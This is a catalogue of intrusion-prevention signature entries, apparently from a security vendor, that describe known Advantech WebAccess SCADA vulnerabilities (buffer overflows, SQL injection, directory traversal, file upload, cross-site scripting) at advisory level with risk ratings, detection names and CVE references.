Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-694-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A successful exploitation could result in code execution in the security context of the target user.

Situation:

File-TextId_Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow

References:

CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208

Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-691-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A successful exploitation could lead to code execution.

Situation:

File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow

References:

CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208

Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-684-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. An unauthenticated attacker can remotely exploit this vulnerability, which can lead to code execution in the context of the target user.

Situation:

File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow

References:

CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208

Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-699-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A remote attacker can use this to accieve code execution in the security context of the target user.

Situation:

File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow

References:

CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208

Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-683-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in Advantech's WebAccess SCADA software. The vulnerability is due to insufficient input validation of InterfaceFilter's argument in the AspVCObj ActiveX control. A remote, unauthenticated attacker can exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation can lead to code execution in the context of the target user.

Situation:

File-TextId_Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow

References:

CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208

Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-689-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A successful exploitation could lead to code execution.

Situation:

File-TextId_Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Getrecipeinfo-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Getrecipeinfo-Stack-Buffer-Overflow

References:

CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208

Advantech-WebAccess-Blind-SQL-Injection

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Malfunction
Description:	There is an SQL injection vulnerability in Advantech WebAccess which allows an attacker to retrieve information such as administrator's credentials.
Situation:	HTTP_CRL-Advantech-WebAccess-Blind-SQL-Injection

Advantech-WebAccess-Bwpfile-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-1291-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Advantech WebAccess, versions 9.0.0 prior to 9.0.0.P0320900, which allows remote attackers to delete arbitrary files on the target system, due to the insufficient validation of the BwPFile component.

Situation:

MSRPC-TCP_Advantech-WebAccess-Bwpfile-Stack-Based-Buffer-Overflow

References:

CVE-2020-16215
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16215

Advantech-WebAccess-Bwrpswd.exe-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Bwrpswd.exe-Stack-Based-Buffer-Overflow

References:

CVE-2019-6550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6550

Advantech-WebAccess-Dashboard-Openwidget-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-744-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

Multiple directory traversal vulnerabilities in the request parsing routines of Advantech WebAccess may result in an attacker gaining the ablity to download arbitrary files.

Situation:

HTTP_CRL-Advantech-WebAccess-Dashboard-Openwidget-Directory-Traversal

References:

CVE-2016-0855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0855

Advantech-WebAccess-Dashboard-Removefile-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-740-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

A directory traversal vulnerability in the request parsing routines of Advantech WebAccess may result in denial of service or data corruption when exploited.

Situation:

HTTP_CRL-Advantech-WebAccess-Dashboard-Multiple-Directory-Traversal-Vulnerabilities

References:

CVE-2016-0855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0855

Advantech-WebAccess-Dashboard-removeFolder-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-743-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in the Dashboard component of Advantech WebAccess. A remote attacker can use this to acchieve a denial-of-service condition.

Situation:

HTTP_CRL-Advantech-WebAccess-Dashboard-Multiple-Directory-Traversal-Vulnerabilities

References:

CVE-2016-0855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0855

Advantech-WebAccess-Dashboard-Uploadimagecommon-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-739-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Arbitrary code can be executed by exploiting a file upload vulnerability resulting from insufficient input validation in the uploadImageCommon() method in the UploadAjaxAction script.

Situation:

HTTP_CS-Advantech-WebAccess-Dashboard-Uploadimagecommon-Arbitrary-File-Upload

References:

CVE-2016-0854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0854

Advantech-WebAccess-Datacore-Service-Function-0x5228-Strcpy-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-753-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

An improper boundary check in the RPC interface of Advantech WebAccess results in a vulnerability which can be exploited to gain System-privileged code execution on the target host.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Datacore-Service-Function-0x5228-Strcpy-Heap-Buffer-Overflow

References:

CVE-2016-0857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0857

Advantech-WebAccess-Datacore-Service-Function-0x523a-Strcpy-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-751-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Arbirtrary code can be executed by an attacker by sending a crafted MSPC request to the affected server. The vulnerability results from the server not validating the input to the 0x523a function.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Datacore-Service-Function-0x523a-Strcpy-Buffer-Overflow

References:

CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856

Advantech-WebAccess-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-607-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Malfunction

Description:

There is an absolute path traversal vulnerability in Advantech WebAccess which can allow remote attackers to read arbitrary files. Advantech WebAccess is a browser-based HMI / SCADA software.

Situation:

HTTP_CRL-Advantech-WebAccess-HMI-And-SCADA-Software-Cross-Site-Scripting

References:

CVE-2013-1627
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1627

Advantech-WebAccess-HMI-And-SCADA-Software-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-508-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

A cross site scripting vulnerability has been reported in Advantech WebAccess HMI/SCADA software. The vulnerability is due to improper validation of input passed via the 'ProjDesc' parameter. A remote attacker can exploit this vulnerability to execute arbitrary HTML and script code in a browser session in the context of the vulnerable site.

Situation:

References:

BID-57178
http://www.securityfocus.com/bid/57178

OSVDB-89067
http://www.osvdb.org/89067

Advantech-WebAccess-HMI-Designer-Pm3-Nanimatedgraphic-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess HMI Designer

Risk:

Moderate

First detected in:

sgpkg-ips-1396-5242

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability has been reported in the project management file parsing component of Advantech WebAccess HMI Designer. The vulnerability is due to lack of validation while processing user-supplied NAnimatedGraphic object data. A remote attacker can exploit this vulnerability by enticing a target user into opening a crafted PM3 file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.

Situation:

File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nanimatedgraphic-Heap-Buffer-Overflow

References:

CVE-2021-33000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33000

Advantech-WebAccess-HMI-Designer-Pm3-Nhtrendgraph-Memory-Corruption

About this vulnerability:

A vulnerability in Advantech WebAccess HMI Designer

Risk:

Moderate

First detected in:

sgpkg-ips-1399-5242

Last changed:

sgpkg-ips-1399-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Malfunction

Description:

Improper processing of user-supplied NHTrendGraph object data causes a memory corruption vulnerability in Advantech WebAccess HMI Designer. A successful attack can allow code to be executed with the privileges of the affected user.

Situation:

File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nhtrendgraph-Memory-Corruption

References:

CVE-2021-33004
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33004

Advantech-WebAccess-HMI-Designer-Pm3-Nmultistatelamp-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess HMI Designer

Risk:

Moderate

First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper validation of user supplied NMultistateLamp object data in files causes a heap buffer overflow vulnerability in Advantech WebAccess HMI designer. A successful attack can result in code execution on the target system.

Situation:

File-OLE_Advantech-WebAccess-HMI-Designer-Pm3-Nmultistatelamp-Heap-Buffer-Overflow

References:

CVE-2021-33000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33000

Advantech-WebAccess-IOCTL-0x1138b-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1437-5242

Last changed:

sgpkg-ips-1437-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes an buffer overflow vulnerability in Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-0x1138b-Stack-Based-Buffer-Overflow

References:

CVE-2021-38389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38389

Advantech-WebAccess-IOCTL-10001-Bwflapp-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1398-5242

Last changed:

sgpkg-ips-1398-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes an integer overflow vulnerability in Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-10001-Bwflapp-Stack-Based-Buffer-Overflow

References:

CVE-2021-38408
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38408

Advantech-WebAccess-IOCTL-10001-Bwfrerpt-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	Moderate
First detected in:	sgpkg-ips-1397-5242
Last changed:	sgpkg-ips-1397-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Buffer Overflow
Description:	Improper handling of user-sent data in RPC requests causes an integer overflow vulnerability in Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-10001-Bwfrerpt-Stack-Buffer-Overflow

Advantech-WebAccess-IOCTL-10001-Bwimgexe-Stack-Based-Buffer-Overflow

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	Moderate
First detected in:	sgpkg-ips-1399-5242
Last changed:	sgpkg-ips-1399-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Buffer Overflow
Description:	Improper handling of user-sent data in RPC requests causes an integer overflow vulnerability in Advantech WebAccess. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation:	MSRPC-TCP_CPS-Advantech-WebAccess-IOCTL-10001-Bwimgexe-Stack-Based-Buffer-Overflow

Advantech-WebAccess-Multiple-ActiveX-Vulnerabilities

About this vulnerability:	A vulnerability in Advantech WebAccess
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Advantech WebAccess
Type:	Malfunction
Description:	There are multiple ActiveX control vulnerabilities in Advantech WebAccess which may allow remote code execution.
Situation:	File-Text_Advantech-WebAccess-Webeyeaudio.ocx-ActiveX-Buffer-Overflow File-Text_Advantech-WebAccess-NVLive.ocx-ActiveX-Buffer-Overflow File-Text_Advantech-WebAccess-Epoch-Making.dll-ActiveX-Buffer-Overflow File-Text_Advantech-WebAccess-Dvs.ocx-ActiveX-Buffer-Overflow File-Text_Advantech-WebAccess-CellVision.ocx-ActiveX-Buffer-Overflow

Advantech-WebAccess-NMS-Configrestoreaction-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1272-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

An arbitrary file upload vulnerability has been reported in Advantech WebAccess NMS. The vulnerability is due to insufficient input validation on file paths in the ConfigRestoreAction servlet. A remote, unauthenticated attacker can exploit this vulnerability by submitting a crafted request to the target server. Successful exploitation could lead to arbitrary code execution under the security context of the SYSTEM.

Situation:

HTTP_CS-Advantech-WebAccess-NMS-Configrestoreaction-Arbitrary-File-Upload

References:

CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621

Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1279-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Improper validation of file paths in the DBBackupRestoreAction servlet causes a file upload vulnerability in Advantech WebAccess. A successful exploit allows an attacker to overwrite files that will be executed with system privileges.

Situation:

HTTP_CS-Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload
File-Member-Name_Advantech-WebAccess-NMS-Dbbackuprestoreaction-Arbitrary-File-Upload

References:

CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621

Advantech-WebAccess-NMS-Download.jsp-Arbitrary-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech WebAccess/NMS

Risk:

High

First detected in:

sgpkg-ips-1283-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Advantech WebAccess NMS. The vulnerability is due to insufficient input validation on file paths while processing the calls to download.jsp endpoint. A remote, unauthenticated attacker can exploit this vulnerability by submitting a crafted request to the target server. Successful exploitation could delete or read arbitrary files on the target server under the security context of the SYSTEM.

Situation:

HTTP_CRL-Advantech-WebAccess-NMS-Download.jsp-Arbitrary-Directory-Traversal

References:

CVE-2020-10631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10631

Advantech-WebAccess-NMS-Downloadaction-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech WebAccess/NMS

Risk:

Moderate

First detected in:

sgpkg-ips-1072-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Advantech WebAccess NMS. A remote attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation might result in arbitrary file read.

Situation:

HTTP_CRL-Advantech-WebAccess-NMS-Downloadaction-Directory-Traversal

References:

CVE-2018-7503
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7503

Advantech-WebAccess-NMS-Fwupgradeaction-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WebAccess/NMS

Risk:

High

First detected in:

sgpkg-ips-1288-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

An arbitrary file upload vulnerability has been reported in Advantech WebAccess NMS. The vulnerability is due to insufficient input validation on file paths while processing the calls to FwUpgradeAction.action endpoint. A remote, unauthenticated attacker can exploit this vulnerability by submitting a crafted request to the target server. Successful exploitation could lead to arbitrary code execution under the security context of the SYSTEM.

Situation:

HTTP_CS-Advantech-WebAccess-NMS-Fwupgradeaction-Arbitrary-File-Upload

References:

CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621

Advantech-WebAccess-NMS-LicenseImportAction-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WebAccess NMS

Risk:

High

First detected in:

sgpkg-ips-1291-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

There exists a vulnerability in Advantech WebAccess NMS, versions before 3.0.2, which allows remote attackers to execute arbitrary code by sending a crafted request to the target system, due to the insufficient validation of file paths while processing the calls to the licenseImportAction.action endpoint.

Situation:

HTTP_CS-Advantech-WebAccess-NMS-LicenseImportAction-Arbitrary-File-Upload

References:

CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621

Advantech-WebAccess-NMS-ProfileResource-importFile-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-1276-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

There exists a vulnerability in Advantech WebAccess NMS, versions prior to 3.0.2, which allows remote attackers to execute arbitrary code by submitting a crafted request, due to the insufficient input validation on the file paths sent to the importFile endpoint.

Situation:

HTTP_CS-Advantech-WebAccess-NMS-ProfileResource-importFile-Arbitrary-File-Upload

References:

CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621

Advantech-WebAccess-NMS-saveBackgroundAction-Directory-Traversal

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-1294-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

There exists a vulnerability in Advantech WebAccess NMS, versions prior to 3.0.2, which allows remote attackers to cause a denial of service condition by sending a crafted request to the target server, due to the insufficient input validation on file paths to the saveBackground.action endpoint.

Situation:

HTTP_CS-Advantech-WebAccess-NMS-saveBackgroundAction-Directory-Traversal

References:

CVE-2020-10619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10619

Advantech-WebAccess-NMS-Supportdeviceaddaction-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1262-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Insufficient input validation causes a file upload vulnerability in Advantech WebAccess NMS. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-Member-Name_Advantech-WebAccess-NMS-Supportdeviceaddaction-Arbitrary-File-Upload

References:

CVE-2020-10621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10621

Advantech-WebAccess-Node-Chklogin2-SQL-Injection

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Insufficient input validation causes an SQL injection vulnerability in Advantech WebAccess. A successful exploit allows an attacker to do database operations on the target.

Situation:

HTTP_CRL-Advantech-WebAccess-Node-Chklogin2-SQL-Injection

References:

CVE-2018-5443
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5443

Advantech-WebAccess-Node-Webvrpcs-Uninstallwa-Denial-Of-Service

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1163-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Malfunction

Description:

There has been reported a denial-of-service vulnerability in Advantech WebAccess. This vulnerability could be exploited by remote attacker causing denial-of-service conditions on the target server.

Situation:

MSRPC-TCP_Advantech-WebAccess-Node-Webvrpcs-Uninstallwa-Denial-Of-Service

References:

CVE-2019-6554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6554

Advantech-WebAccess-Rmtemplate.aspx-SQL-Injection

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-989-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Insufficient validation of HTTP requests causes an SQL injection vulnerability in Advantech WebAccess. A successful attack allows arbitrary SQL to be perfomed remotely without authentication.

Situation:

HTTP_CRL-Advantech-WebAccess-Rmtemplate-SQL-Injection

References:

CVE-2017-12710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12710

Advantech-WebAccess-Scada-Bwdlgpup-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1194-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

Improper handling of user-sent data in RPC requests causes a file deletion vulnerability in Advantech WebAccess. A successful exploit allows an attacker to delete arbitray files with administrator privileges.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwdlgpup-Arbitrary-File-Deletion

References:

CVE-2019-13552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13552

Advantech-WebAccess-Scada-Bwdraw-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

High

First detected in:

sgpkg-ips-1215-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Malfunction

Description:

An out-of-bounds write vulnerability exists in Advantech WebAccess. The vulnerability is due to a lack of boundary checks while processing input data in bwdraw.exe. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted RPC request to the target server. Successful exploitation could lead to arbitrary code execution under context of Administrator.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwdraw-Out-Of-Bounds-Write

References:

CVE-2019-10987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10987

Advantech-WebAccess-Scada-Bwgetval-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1193-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Directory Traversal

Description:

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwgetval-Arbitrary-File-Deletion

References:

CVE-2019-13552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13552

Advantech-WebAccess-Scada-Bwmail-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1178-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwmail-Stack-Based-Buffer-Overflow

References:

CVE-2019-10991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10991

Advantech-WebAccess-Scada-Bwmainleft-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1116-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Improper handling of user-sent data in HTTP requests causes a cross-site scripting vulnerability in Advantech WebAccess. A successful exploit allows an attacker to run scripts in the user's web browser.

Situation:

HTTP_CRL-Advantech-WebAccess-Scada-Bwmainleft-Cross-Site-Scripting

References:

CVE-2018-15707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15707

Advantech-WebAccess-Scada-Bwmakdir-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1106-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Input Validation

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability- A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwmakdir-Stack-Based-Buffer-Overflow

References:

CVE-2018-7499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7499

Advantech-WebAccess-Scada-Bwnodeip-Stack-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Advantech WebAccess

Risk:

Moderate

First detected in:

sgpkg-ips-1112-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Advantech WebAccess

Type:

Buffer Overflow

Description:

Improper handling of user-sent data in RPC requests causes a stack-based buffer overflow vulnerability- A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

MSRPC-TCP_CPS-Advantech-WebAccess-Scada-Bwnodeip-Stack-Based-Buffer-Overflow

References:

